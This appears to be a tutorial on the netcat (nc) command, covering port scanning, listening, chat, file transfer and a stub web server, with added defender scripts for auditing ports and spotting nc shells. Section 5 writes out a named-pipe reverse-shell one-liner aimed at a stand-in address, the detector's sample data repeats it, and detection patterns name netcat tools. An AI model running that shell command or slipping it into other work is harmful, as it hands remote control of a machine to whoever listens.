The nc (netcat) command sends and receives data over the TCP and UDP protocols. It does not have a large feature set, but it is enough to check a connection and carry out simple debugging.
We’ll look at a few examples to help you understand how to communicate over TCP and how it can be used in real life, for example for file sharing. We will also point out more suitable commands, since nc has managed to become obsolete.
nc syntax and options
General form of the nc command:
$ nc -options address port(s)
Some options take a value and some do not. Here is a list of the most commonly used options:
- -6 – use IPv6. The default is -4, that is, IPv4;
- -h – display help with a list of available options;
- -i delay – add a delay between sending strings or port scanning. Set in seconds;
- -l – listen mode. Used with port specification;
- -N – close the connection when the end of the file is reached when sending it;
- -n – work with IP addresses directly without using DNS, and also disable port lookup;
- -P username – specify the username for connecting to the proxy;
- -x address:port – specify the address and port for connecting to the proxy;
- -p port – specify the port number. In most cases, the port can be given without this option;
- -U – use UNIX domain socket (for interprocess communication);
- -u – use UDP protocol, TCP is used by default;
- -v – verbose mode. Used in port scanning;
- -W number_of_packets – close the connection after receiving a certain number of packets;
- -w timer – enable timer to limit connection time. Set in seconds;
- -z – disable sending data. Used in port scanning.
Examples of using nc
1. Port check
Port checking is one of the main uses of the nc command. To do this, use the two options -vz and specify the address and port. You can also specify a range of ports, but in that case it is better to keep only the open ports by filtering the output with the grep command. In the example, we check the ports of a local network address:
nc -vz 192.168.31.247 8080
nc -vz 192.168.31.247 1-1000 2>&1 | grep succeeded
In a similar way, you can scan UDP ports by adding the -u option:
nc -vzu 192.168.31.247 1-1000 2>&1 | grep succeeded
Keep in mind the difference between TCP and UDP: UDP is connectionless, so UDP ports are always reported as available in this check.
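To act on the scan results from the defender's side, the added example below (not part of the original article) compares nc -vz output with the ports you expect to be open and reports anything unexpected or missing. The function names, the allowlist and the sample lines are constructed, and the message layout assumed is the one OpenBSD nc prints.

```sh
#!/bin/sh
# Added example: audit `nc -vz` results against the ports expected to be open.
# Assumption: OpenBSD-style messages such as
#   Connection to HOST PORT port [tcp/NAME] succeeded!
# Some builds print "HOST (IP) PORT"; the port is the word before "port".

audit_ports() {
    # $1 = space-separated ports expected to be open; stdin = nc -vz output
    awk -v allow="$1" '
    BEGIN { n = split(allow, want, " "); for (i = 1; i <= n; i++) ok[want[i]] = 1 }
    /succeeded!/ {
        for (i = 2; i <= NF; i++) {
            if ($i == "port") {
                seen[$(i - 1)] = 1
                if (!($(i - 1) in ok)) print "unexpected", $(i - 1)
                break
            }
        }
    }
    END { for (i = 1; i <= n; i++) if (!(want[i] in seen)) print "missing", want[i] }'
}

# Constructed sample lines in the format described above.
sample_scan() {
cat <<'EOF'
Connection to 192.168.31.247 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.31.247 port 23 (tcp) failed: Connection refused
Connection to 192.168.31.247 8080 port [tcp/http-alt] succeeded!
Connection to 192.168.31.247 (192.168.31.247) 5432 port [tcp/postgresql] succeeded!
EOF
}

# Ports 22, 443 and 8080 are the ones this host is supposed to expose.
sample_scan | audit_ports "22 443 8080"
```

In real use, pipe the scan itself into the function, with 2>&1 so that the messages nc writes to stderr are included.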
2. Listening on a port
To listen on a port, use the -l option. In general, this is sufficient, but you can enable verbose mode:
nc -nlv 8080
Recall that when using the TCP protocol, the port must be free, otherwise you will see an error: Already in use. It is also worth noting that ordinary users cannot use every port: port 80 (HTTP), for example, is not only likely to be occupied by another process, but also requires superuser rights.
3. Chat and file sharing
Another useful feature of the nc command is communication. Let’s look at the simplest example – text chat. In order to start a chat on one computer, run the utility in port listening mode:
nc -lp 8080
On another computer, you will need to specify the address of the first computer and the same port (in the examples, 0.0.0.0 stands in for that address). Also don’t forget to check that the port is open:
nc 0.0.0.0 8080
This example shows that you can both send and receive messages this way. Another use of the command follows from this: file sharing. The scenario is similar, with the only difference that we redirect the output to a file, in our case paste.txt:
nc -l 8080 > paste.txt
On another computer, the input will be the copy.txt file. It is worth using the -N option to close the connection after the file has been transferred:
nc -N 0.0.0.0 8080 < copy.txt
To transfer files, it is important to follow the sequence: first start listening, and only then send the file.
The nc command works, but it is not the best way to transfer files. Previously, we considered other ways to transfer files; with them you can track the progress of a file transfer, and in some cases even resume the process.
4. Simple web server
Since the nc command works with the TCP protocol, it can be used to both send and receive HTTP requests, which means that the utility can become the simplest web server. Of course, you won’t be able to launch anything more complicated than a stub page, but this operation will take almost no time, and besides, you won’t need to install anything for this.
In our example, we will generate an HTTP response with an index.html file. As for the nc command itself, it is worth setting a timer with the -w 1 parameter to break the connection if the browser does not:
while true; do echo -e "HTTP/1.1 200 OK\n\n$(cat index.html)" | nc -l -w 1 -p 8080; done
To receive data from a site, you can form a request and send it to the required address and port. But this method is quite complicated, so it is much better to use the more appropriate curl command.
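The response in the web server loop of this section consists of a status line and the file body only. As an added example (not from the original article), the function below builds a complete response with CRLF line endings and a Content-Length header, and answers 404 when the file cannot be read; the name http_response is hypothetical.

```sh
#!/bin/sh
# Added example: build a well-formed HTTP/1.1 response for a stub page.
# Usage with the loop from the article (nc flags as used there):
#   while true; do http_response index.html | nc -l -w 1 -p 8080; done

http_response() {
    file=$1
    if [ -f "$file" ] && [ -r "$file" ]; then
        status="200 OK"
        body=$file
    else
        # Missing or unreadable file: empty body instead of a 200 with an error.
        status="404 Not Found"
        body=/dev/null
    fi
    # wc pads its output on some systems, so strip the spaces.
    length=$(wc -c < "$body" | tr -d ' ')

    # Header lines end in CRLF; an empty line separates headers from the body.
    printf 'HTTP/1.1 %s\r\n' "$status"
    printf 'Content-Type: text/html; charset=utf-8\r\n'
    printf 'Content-Length: %s\r\n' "$length"
    printf 'Connection: close\r\n\r\n'
    cat "$body"
}
```

With Content-Length and Connection: close in place, the client knows where the body ends without waiting for the -w timer.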
5. Remote Shell
If you remember how we did the chat, another idea may arise: remote access to the computer shell. Previously, the nc utility had several options for opening terminal access. The -e parameter was removed from the utility a long time ago, so there is no longer easy access to the terminal. The utility itself has become more secure, but it can still work in conjunction with other tools.
Let’s show the connection using a named pipe created with mkfifo. But first, let’s start listening on the port on the computer on which we will gain access:
nc -lvnp 8080
Now let’s go directly to the command to open the terminal. First, delete the old named pipe ( rm /tmp/f ), create a new one in its place ( mkfifo /tmp/f ), read its contents ( cat /tmp/f ), and pipe them into an interactive shell ( sh -i 2>&1 ). After that, it remains to run nc with its output going to our named pipe ( nc 0.0.0.0 8080 >/tmp/f ):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 8080 >/tmp/f
It should be understood that this is, in fact, one of the hacking methods; however, it can be useful if there are problems with ssh. In order to prevent an attack, set up a security policy and a firewall.
Conclusions
Netcat is a rather old program whose main task is to check ports. If we talk specifically about network scanning, then nmap has many more functions. But with the help of nc, you can organize the simplest client-server messaging.
You can also use nc as a remote shell, but in fact there are quite a few ways to connect besides ssh, and there are even cheat sheets and entire sites about them, so do not forget to check what you enter in the server terminal.
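A defender-side check for the pattern shown in this section, as an added example that is not part of the original article: it scans process command lines for an interactive shell attached to nc through a named pipe, and for the -e option mentioned above. The sample lines are constructed, and the "PID COMMAND" layout (as printed by ps -eo pid,args) and the function names are assumptions.

```sh
#!/bin/sh
# Added example: flag process command lines that attach an interactive shell
# to nc through a named pipe, or that pass nc the -e exec option.
# Assumptions: input is "PID COMMAND..." (as from `ps -eo pid,args`), and the
# whole one-liner is visible in one command line (for example under `sh -c`).

flag_nc_shells() {
    awk '
    {
        pid = $1
        cmd = $0
        sub("^[ \t]*[0-9]+[ \t]+", "", cmd)          # drop the PID column
        nc = "(^|[ /;|&])(nc|ncat|netcat)"           # nc as a command word
        has_nc    = (cmd ~ (nc "[ \t]"))
        has_fifo  = (cmd ~ "(^|[ /;|&])mkfifo[ \t]")
        has_shell = (cmd ~ "(^|[ /;|&])(sh|bash|dash|zsh)[ \t]+-i")
        # -e among the arguments of nc itself, not of a later pipeline stage
        has_exec  = (cmd ~ (nc "([ \t]+[^ \t|;&]+)*[ \t]+-[A-Za-z]*e[ \t]"))
        if (has_nc && has_fifo && has_shell) print pid, "fifo-shell"
        else if (has_exec)                   print pid, "exec-option"
    }'
}

# Constructed sample process list; only PIDs 1377 and 1450 should be flagged.
sample_ps() {
cat <<'EOF'
 1201 nc -vz 192.168.31.247 8080
 1377 sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 8080 >/tmp/f
 1402 nc -l 8080
 1450 /usr/bin/ncat -e /bin/sh 0.0.0.0 8080
 1502 rsync -avz /srv/data backup:/srv/
EOF
}

sample_ps | flag_nc_shells
```

When the pipeline is typed interactively, each stage is a separate process, so this check complements rather than replaces the firewall and policy controls mentioned above.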